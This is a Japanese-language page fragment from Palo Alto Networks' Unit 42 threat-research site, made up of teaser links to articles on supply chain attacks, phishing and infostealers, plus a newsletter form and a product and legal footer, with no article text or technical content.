  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月11日 [#### 国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/ja/tag/backdoor-ja/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/ "国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用")  
  ![Pictorial representation of runtime assembly attacks. Digital artwork of a glowing, futuristic shield disintegrating into small particles, set against a dark blue, bokeh-effect background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/09_Business_email_compromise_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月22日 [#### ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/)

* [API](https://unit42.paloaltonetworks.com/ja/tag/api-ja/ "API")

* [Google](https://unit42.paloaltonetworks.com/ja/tag/google-ja/ "Google")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/ "ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成")  
  ![Pictorial representation of SLOW#TEMPEST campaign. Digital artwork depicting a malware alert symbol on a computer screen, with background of blurred programming code in blue and red colors.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/07_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月2日 [#### Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer](https://unit42.paloaltonetworks.com/ja/vvs-stealer/)

* [Discord](https://unit42.paloaltonetworks.com/ja/tag/discord/ "Discord")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")

* [Python](https://unit42.paloaltonetworks.com/ja/tag/python-ja/ "Python")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/vvs-stealer/ "Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
